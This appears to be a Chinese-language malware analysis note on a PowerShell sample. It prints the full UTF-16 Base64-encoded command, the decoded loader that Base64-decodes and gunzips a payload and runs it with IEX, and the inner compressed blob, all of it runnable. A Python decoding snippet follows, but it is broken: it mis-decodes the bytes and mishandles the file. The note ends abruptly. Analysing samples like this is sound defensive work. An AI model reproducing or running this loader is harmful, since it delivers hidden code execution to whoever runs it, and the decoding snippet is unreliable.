JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADQAKwBpAFMAaAByACsAMwBQADQASwBQAG4AUwBpAFIAcgBzAGIAQgBHADIAZAB6AFMAUQBIAEYAQgBRAEYAVgBQAEMAQwA5AHUAbAAwAHUASgBTAEkASQByAGMAcQBWAEQAZwB6AC8ALwAwAFUAcQBIADEANgBkAG4AcAAyAEoAOQBrADEASQBWAFkAVgA3AC8AVgA1AEwALwBXAGkAQQBmAFMAZwBvAGQAaQAxAGsAQgB6AFkAZwBIAGgAWQBnAEIAaQA2AGcAVQA4ADAAUwBxAFgANwBYAGkAQQBpADQAaQB2AHgAUgA3AG0AMABTAFgAdwBMADUAYwBmADUANABzADAAQgA2AEMAMgBNAEEAKwB2AE4AcwBPADAAWQBRAEUAagA4AFYAYgBxAGIARwBMAEYAeABJAEMAcgAzAFIAeQBOACsATwB3AFIAMgA0AG8ARQA2AFUAVwB4AHkAUQBtAEEAbgBNAGEAagBlADMAWgBYAHUAaQBxAFAARQBoADgAWQBHAHYAUABrAEcAYwBvAC8AZwA3AFEARABRAE4AcgBBAGgAVgBsAFIANQBZAGMATwB3AEYAeAB3AE0AMQAzAC8AOQA4AHEAVwBiAHgARABIAHcAMABXAFgALwAyAEEAZQBJAGgAUgBBAGMAVABNADgARgBzAEYASQBsAHYAaABIAEwATABZAGoAQgB3ADkAagBjAEEAUQBzAFIAZgB4AEgAMwBiADQAOQA5AEwAegBBAE4ANwAwAHEAVwBkAGcAMQByAGkAeAAxAGkAZgBUAHQALwBKAHcAVwBXAGsAWAB2AHcAcQBJAFcAZQBpAHkAcgBsAFAALwA4AHMAVgAxADgAZQBxAE4AZABIAFAAawBvAE0ARAAxAGIASwBXAGcAbwBSAE8ARAB6AGEAbgBsAGUAdQBFAHQAKwByAHUAYwBKAFoARwBvAEoASwBXAFgAYQB0AE8ASQBEAEIAQgBqADAAdQBYAFoAOQB1AFAATQA0AEwANgA1AFgAQwBlAFAAbABpAGUANwBsADYAOQBjAHcASgBEAGUAegBIAHIANQAzAE0AcABWADUANABLAG0AVwA4AG4ARwBCAHMAMgBBAHUARwA1AFQAcgB4AGsAdQB0ADcAZQBYADAAbAAvAG4AaQAzAFIAawAxADgANQBCADcAQQBvACsAZwBqAEUAQQBlAGgAQgB1AEsAagBhAHcASAA0AE8ARABCADgAMgB3AE0AcQAyAEcAQwAyAE0AcwBUAGgAOAA1ADEAeQBGAFIAcwBSAEEANQBUAEUAUABuAEcAegBCAGYATQBkAGcAegAyAG8AMwBQAHUASgA1ADkAVwB4ADMASgBmAGYAbABmAHQAYQBVAGMARABwAEIAdQA3AHYATQBsAFUAKwBNAG0ARwBxAEMAWQBxAHIAOQBXAHQATwAvAEEANABjAGMAcABFADMARgAzAEgAWQBuAFoAKwBzAC8ANQBCAGMAVgBmAHoANwBLAGMARwBxAHAAZQArAGwAVAAxAEwAVgBCAGgANQB3AEQAQQBUAGUARQBNAGIAMwBRADYANgBXADcAdQA1AGUAaQBpAFgAQQAvAGwAUQBtAEEAWABRAEwAdgBxADgARQBXAFMAZABrAGIASQBTAEIAZwBqAGoATgB3AHoAbQBMAEUAMQBCADkALwBTAGMAKwBGADcAVQAzAFQAbABqAC8AcABTAEQAcQB4AG4AWABsAHUAWQBUAG4AWQBzAGQAWAA0AG0AVQBSAHUAUABaAHIANgBhADUAYQB1AG0AWgBQAGYAdgA1AG0ASgBxADUAbgBnAHoAaAAvAC8AKwB0AHEANgBJAEcATgA2ADQATgBlADYAaABzAEgAMQA3AG8AbABmAE8AVwB6AG0ASQBHAE4AQgB3AG8AOABIAG0AOQBrAEMAcgBhAHoAVQByADYAKwBBAEgAYgB2AGkAawA0ADUAQgAvAFQAbABaAHoAYgArADQASwBKADMAWAB1ADUAaQBIAEcAdgBoAHUARQBOAHMARgBVADYASgA2AG8ALwBHAFgARwBKAFkASwBZAHUAKwBEAEEANABZAHYAOABzAGUAcAArAG4AOQBCAHAAYwBaAHUARgBGAGYAUwB5AHUAOQBhAGMALwAzAGUAUwA1ADMAUABRAFAAQwBPAGoARgBKAGMASgAxAGIAZABVAEkARABoAGcAZgBzAE8AcwBIADYAMABMADIAKwBZAGgATQBVAEYATQB2AHkAUAArAGIASwBpAFkAZABjAHkANABEAG8ASgB1ADYAMQArAGcAbQBrAFYAOQBYAGQAdwBNAGMAVgBrADEAZwA0AHUAaABpAEcAbQBSAFkAQwB5AHoAVwA4AEgASgBVADYATQBYAEIAdAB3AEsAVwBhADYAOQB4AE0ASwBIACsASwBTAGQAZgB3AFAARgB4AHkAVwBOAEkAUgB4AHcAUwBmADUARgBoAG8ASwBNACsAWgAyAEsANwAvAGUAMwA1AFUASAB6AFcAQQB4AEUAUABvAGcAUQBPAG0ATAByAHEAUQA0AEIAawBPADcAagBuAFgAaQBpAHIAUwB6AFgAQwBBAFgAZgA0AFAAWgB0AC8AcQA1AEYASQBVAE8AVgBZADMAawBEADQAWQBqAFIATgBBADgAdwBKAFUASgB4AFoAdQBqAEgAQgBmAEsAOQBkAC8AUwByAHoALwB6AGIAdwBmAFcAOAB3AFAAWgBuAFoAagBjAEEAMQBrAHAAUwBqAEUARgB5ADUARgBlAGIAawBVAGwARgBaACsAdQBYAHgAOQB4ADcASgBBAEwAawBZAFkATgBTAEUATwBEAHAAdwBCAFEAWQB2AFIAaQBqAFoAVwBLAGQAUAB0AEoAQgBKAFQAZQBUAGQAdAB4AFgAMwArAEsAQQB5AGkAQQBUAC8ARAB6AHgARQAvAGQAQwBUAHcAawBqAFIAVQBRADAANgBWAEwARAA0AFoAVAB3AGIAawBjAEMATgBPADIAegAwAG0ATwBTAFYAaQBNAHUATgBJAFcAaQBBAHgAWABSAGIAMQArAFkAMQA0AEgAQQBjAHIASwBqAGsAdwBsAEIAMgBLAFIAdwBXAGYAdwBlAGQAbwBBAEgAdgBpAHMAYwBjAE8ARwBsAEUAZwB0AEIAeQAzAGMANQBWAHoANABaACsAYQBKADgAcgBVAFIAZQBIAFoANwBBAHYATQBZAEEARwBGAG4ASAA0AGcASABqAGsAaAA2AG4AWQBDAHYASAA0AFMAagA5ADEAZwBpAFAAbgBhAHIAZABEAG4AVABqAFkARAArAEcARQBMADYASgBKADEAbwBsAEUAYgBHAE0ANAA1AEgAUwAxAHEARwBrAG4AMQBGADYAawBpAEwAZgBoAFEAMABYAHgAYgBNAHEAbQBwAE0ARgBTAHkAUgBvAHAAOQB3AG4ANQBwADkARQBBAGwAYgBmAHgAbwBaADQAOQBhAEIAagBPAHIAQQA2AE4AQgA3AGkALwBnAHAATQBqAHkAaAAwAE4AeABNAEUAeQAxAHAAdQBPAEsAcQBYAEsAeQBTAEUAUgBHAGMAZQBiAFIAawAzAFcAVwBSAG0AMwBNAHIAegBBAFkAawA3AE8AVwB5AGkAcgBUAHMAcwArAFcATABwAHcAcwBYAFoASABTAHcAVQByAHAAWQB4ADEAUgBzAG4AUwBZAGcAUwBJAEYAWgAzAFkAbgB0AHUASwBlAHAAdABtAFoATgBqAHQAVABHAHIAWAAyAGoAbwBaAHUAZABmAHgAVABvAFYAKwB6AHoAeQBkADcARABzAGYARABHAFYAcgBSAEUAKwBQAEEAcABLAG4AZgAwAHMAUwBkAGUASgBhAHMARQBDADMAMABZAFMAcwAyADAAbQA0AG8AdQBjAEQAawBOAGkAaQBYAE8ANQBUAFcAegByAEQARAA0AHoAVwBQAHoAcQBTAG0AcQBhAG0ATgA5AFgAcQBEAFcAVwArAEUAOQBmAHAAZABXAGMAWQArAEcARQAxAGgAdABRAGYAMABaAEwAUgBVAE0AbwB2AG0ASgBDAHUATgBSAGUAegBIAFoATgBSAHkAcwBlAHcAMgBrAG0AbAA4ADMAdQBQAEQANQBwAFMAYgA3ADgANgBkAEoAMQBkACsAVQBqAGYAVABHAFkAdwBhAFUAUABUAE0AbABJAFYAegBhAEcAYwBqAFgAeAArAFAATgBsAHYAUwBiAGIAQwByAGcAOQBaAGcAZAAxAFQAagBLAEEAMAAyAGoAVgBUAHIAUABEAEYAcwB1AHkAOAAxAFoAcABuAEMAbgBrAGkAKwB4AGcAZgBjAEUAKwBPAFAAcgBYADMAQQBEADcATgBhAEoAbgBxAGkAeQBZADgASABzADUAcQBtAG0AcABBADIAbABWAFIAcAB6AFAAbQAxADIAagBzAE0AZQBYAFYAUAA2AGYAMgBwAGsAbQBoADcAVABwADAASgBuAEsAdwB1AHIASgA2AHAAMgB4AGwATAB6AFgAdQA4AFEAOAA0AGsAZAA3ACsATAB0AHkAQgAwADEAcgBJAHAAMQBPAGIARABuAG4AcQBhADYAbABMAGsATQB1AEgAegA1AHIAbQBOAGsAcABUAFYANAAzAFEATgBtAFUAbgBqADAAQQBzAFcAMgA2ADEAagBRAGoASgBPAHkAYwA2AHEAMgAxAHkAcgAvAEoASABlAFIARABKAE4ARAB1AEoAcwBEAFkAUgAxAEcAdwBnADkAMABzAGkAQwByAE4AbgBhAGEAdwAyAFMATgBvADkAYQA2AEUAUwBRADkAZQB5AFcAVAA2AGwAVQBrADYAbABSADAAQgBnAHoAMgBWAEIATAAwAGoARgA3AG0AdABOAG4AUgBWAHYAZwBDAFkATQB6AHEASQBUAFMAWABHAFUASgBaAGoANABjAHoAeQBkAHIATgBlAFgAOQAzAGwASgBSAFYAMABkADYAdwBTAFMAOAA2AE8AdQByADgAYQBZAFIANgBtAEUAcgB6AE4AYgB5AGYARABMAHYAWgBNAHEAQwBhAGUAagBKAGcAVgBwADQAYQBEAHQAcQByAGoAZQBuAFIAUwBnAEoAeAB2AE0AegAzADIAeQB6AEoAMQA3AGIANgAzADEAaABJADQAdgBNAFgAbwBlAEwAcABYAGkAeQAzAEIASABaADcAbgBJAFIAcgA2AHcANAAwACsAZQBNAFoATgBoAFEAbABhAG4AVwBGAEcAVAA1AGsASQBZAHMAdABKAHEAVQAxADUASgAxAGEAZgBqAHMAUwBYADUAMwBlAGUAUwAwAFQAdgBiAEUAeQB5AGsAdwBuAGIATwAwADAAMwBWADIATQBLAEsARgAvAHYATwBTADkATwBiAFQAYwBCAGUAUgBvAHoANQBuAHkAZwB0AHYASwArADIAMwBwADgAawBUAHMAMQBMAE8AeQAyAG0AUQBIAGEAWABGAG8AcQBVAHcAYQBDAFEAdgA1AFcAQgBXAFcAOABsAEsATABXADEATwBCAE0AdABKAFUAawBwADIAMgBaADMAVwBHAFMAOABkAEgAZQBmAGkAMwB0AHYAaABQAE0ANQB3AFQAawB2ADQAMgBZAG0AMABLAGcASABHAFAAcAAxAHgAagBzAEYAaABrAE4AZgBLAFQAagB5AEcAcQBUAFcASwBlAFoAdQBIAE8AeABiAHYAcgBjAEYAQwBrAHMAMQBsAGQATABLAHoAUgBwAGcAbwBlAHQATgB3ADkAbQBMAFMAeABUAFYAdQA5AGsARwB0AEoAMABYAG8AMgBhAEkARgBlAHoAVABiAHIAeABTAFYASABPAHEAcQAwADUAeAByAGUAMgBvAHcARQA5AFIAcABiADgANwBKAE0AMQBjACsAQwAvAFQAQwB6AEQAdgBaAEoAbwBqAHgAYgBIAEwATwA3AC8AdAAvAEUAZgBqAC8AdwBVAFAARQBlADYALwBDAEgAUQBvADMAdgAvAHkAOABWAHEAdgBtAE0AOABQADcAbQA1AGYANwA4ACsAdAB0AHgAbgB2AGYAUAA1AGgAbgBMAEkAMQB1ADUAbgAyAHYAZQBIAE0AMABQAG4AUwA3AFgAdwAxAE8AcwBoAEgARAByAGUASABoAEwAbwBpAEgAbgA5AHYAVgBKAFEAUwB4AGMAQgAxAGgASgBvAEcAYgBjADEAUQBxAG4AMAAvAGQAZQB4AEQANwB3AE0ATQBUAEsAWgA1AFoAYgB3ADIAZgA5AGIAegBBAHkAbwBlAHUAWAAwAHcALwBlAEEAUwA4AEQARwBhAHYAKwBHAEsAYgA0AHkAWABkACsASABSAFYASgBkADQASgA4AGEAUgAxADgAYwBsAE0ATgBwAHQAaQBNAEwAbAA2AGUASgB2AFAAYgBvAFIAZgB2AHEAeQB4AGUALwBVAFAASQBFAHIAQQBkADkAQwAyAFQAcABCAG4AbQBpAFQASgAvAEoAOABoAHEANgBYAGYAaAA2AFUAYgBoAEcAbgBsAFgAVgB3ADkASAA4AHcAKwBXAFAASgBSAGsAMQBkAG8AcQBsADcAUgBqAHgAUAAvAEEAUAA2AFAAQQBmAGgAQgA2AFgAKwBIAE4AZwBlAHYAbQBPADMAZQBvAFMAcwBNACsAaAB5AHYAYQBxAG4AOABSADYAawBrAGIAbwBnAFAANQA5AEQATgA4AEoAYwBMAGkASQBoADIAawBYAHMAUQBHAFQARgA2ADIAQQBVAG0ALwBzAHcAcAA3AHUAMwBLAHYAVgBFAGwAUgBGADQAbgA3AGcAMwBpAE8ALwBHAEEAMwBXAE0AaAAzAGMARABmAE8AcgBHAFQANQBKAGMANABjAGYAbAAwACsAMABhAGMARABQAGYAQwArAEkAMQBRAGcAUQBYAHcANgBQADAAdwBEAEUAeQBjAHAAUQBEAFAAWQByAG4AbwBRAGsAaABPAGoATQAvACsAQgBqAFcANQBTAG8AbwBMAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA

base64解码:

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

继续怼其base64解码:

H4sIAAAAAAAAAK1Xa4+iShr+3P4KPnSiRrsbBG2dzSQHFBQFVPCC9ul0uJSIIrcqVDgz//0UqH16dnp2J9k1IVYV7/V5L/WiAfSgodi1kBzYgHhYgBi6gU80SqX7XiAi4ivxR7m0SXwL5cf54s0B6C2MA+vNsO0YQEj8VbqbGLFxICr3RyN+OwR24oE6UWxyQmAnMaje3ZXuiqPEh8YGvPkGco/g7QDQNrAhVlR5YcOwFxwM13/98qWbxDHw0WX/2AeIhRAcTM8FsFIlvhHLLYjBw9jcAQsRfxH3b499LzAN70qWdg1rix1ifTt/JwWWkXvwqIWeiyrlP/8sV18eqNdHPkoMD1bKWgoRODzanleuEt+rucJZGoJKWXatOIDBBj0uXZ9uPM4L65XCePlie7l69cwJDezHr53MpV54KmW8nGBs2AuG5Trxkut7eX0l/ni3Rk185B7Ao+gjEAehBuKjawH4ODB82wMq2GC2MsTh851yFRsRA5TEPnGzBfMdgz2o3PuJ59Wx3JfflftaUcDpBu7vMlU+MmGqCYqr9WtO/A4ccpE3F3HYnZ+s/5BcVfz7KcGqpe+lT1LVBh5wDATeEMb3Q66W7u5eiiXA/lQmAXQLvq8EWSdkbISBgjjNwzmLE1B9/Sc+F7U3Tlj/pSDqxnXluYTnYsdX4mURuPZr6a5aumZPfv5mJq5ngzh//+tq6IGN64Ne6hsH17olfOWzmIGNBwo8Hm9kCrazUr6+AHbvik45B/TlZzb+4KJ3Xu5iHGvhuENsFU6J6o/GXGJYKYu+DA4Yv8sep+n9BpcZuFFfSyu9ac/3eS53PQPCOjFJcJ1bdUIDhgfsOsH60L2+YhMUFMvyP+bKiYdcy4DoJu61+gmkV9XdwMcVk1g4uhiGmRYCyzW8HJU6MXBtwKWa69xMKH+KSdfwPFxyWNIRxwSf5FhoKM+Z2K7/e35UHzWAxEPogQOmLrqQ4BkO7jnXiirSzXCAXf4PZt/q5FIUOVY3kD4YjRNA8wJUJxZujHBfK9d/Srz/zbwfW8wPZnZjcA1kpSjEFy5FebkUlFZ+uXx9x7JALkYYNSEODpwBQYvRijZWKdPtJBJTeTdtxX3+KAyiAT/DzxE/dCTwkjRUQ06VLD4ZTwbkcCNO2z0mOSViMuNIWiAxXRb1+Y14HAcrKjkwlB2KRwWfwedoAHvisccOGlEgtBy3c5Vz4Z+aJ8rUReHZ7AvMYAGFnH4gHjkh6nYCvH4Sj91giPnardDnTjYD+GEL6JJ1olEbGM45HS1qGkn1F6kiLfhQ0XxbMqmpMFSyRop9wn5p9EAlbfxoZ49aBjOrA6NB7i/gpMjyh0NxMEy1puOKqXKySERGcebRk3WWRm3MrzAYk7OWyirTss+WLpwsXZHSwUrpYx1RsnSYgSIFZ3YntuKeptmZNjtTGrX2joZudfxToV+zzyd7DsfDGVrRE+PApKnf0sSdeJasEC30YSs20m4oucDkNiiXO5TWzrDD4zWPzqSmqamN9XqDWW+E9fpdWcY+GE1htQf0ZLRUMovmJCuNRezHZNRysew2kml83uPD5pSb786dJ1d+UjfTGYwaUPTMlIVzaGcjXx+PNlvSbbCrg9Zgd1TjKA02jVTrPDFsuy81ZpnCnki+xgfcE+OPrX3AD7NaJnqiyY8Hs5qmmpA2lVRpzPm12jsMeXVP6f2pkmh7Tp0JnKwurJ6p2xlLzXu8Q84kd7+LtyB01rIp1ObDnnqa6lLkMuHz5rmNkpTV43QNmUnj0AsW261jQjJOyc6q21yr/JHeRDJNDuJsDYR1Gwg90siCrNnaaw2SNo9a6ESQ9eyWT6lUk6lR0Bgz2VBL0jF7mtNnRVvgCYMzqITSXGUJZj4czydrNeX93lJRV0d6wSS86Our8aYR6mErzNbyfDLvZMqCaejJgVp4aDtqrjenRSgJxvMz32yzJ17b631hI4vMXoeLpXiy3BHZ7nIRr6w40+eMZNhQlanWFGT5kIYstJqU15J1afjsSX53eeS0TvbEyykwnbO003V2MKKF/vOS9ObTcBeRoz5nygtvK+23p8kTs1LOy2mQHaXFoqUwaCQv5WBWW8lKLW1OBMtJUkp22Z3WGS8dHefi3tvhPM5wTkv42Ym0KgHGPp1xjsFhkNfKTjyGqTWKeZuHOxbvrcFCks1ldLKzRpgoetNw9mLSxTVu9kGtJ0Xo2aIFezTbrxSVHOqq05xre2owE9Rpb87JM1c+C/TCzDvZJojxbHLO7/t/Efj/wUPEe6/CHQo3v/y8VqvmM8P7m5f78+ttxnvfP5hnLI1u5n2veHM0PnS7Xw1OshHDreHhLoiHn9vVJQSxcB1hJoGbc1Qqn0/dexD7wMMTKZ5Zbw2f9bzAyoeuX0w/eAS8DGav+GKb4yXd+HRVJd4J8aR18clMNptiMLl6eJvPboRfvqyxe/UPIErAd9C2TpBnmiTJ/J8hq6Xfh6UbhGnlXVw9H8w+WPJRk1doql7RjxP/AP6PAfhB6X+HNgevmO3eoSsM+hyvaqn8R6kkbogP59DN8JcLiIh2kXsQGTF62AUm/swp7u3KvVElRF4n7g3iO/GA3WMh3cDfOrGT5Jc4cfl0+0acDPfC+I1QgQXw6P0wDEycpQDPYrnoQkhOjM/+BjW5SooLDgAA

结果一看是乱码,往后再看:

New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress)

存在Gzip压缩,通过脚本解压,生成样本文件:

code2 = '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'
code2ed= base64.b64decode(code2).decode('UTF16')
f=open("decoded.gzip",'wb') 
f.write(code2ed) 
f.close

解压该Gzip:

获取到文件decoded:

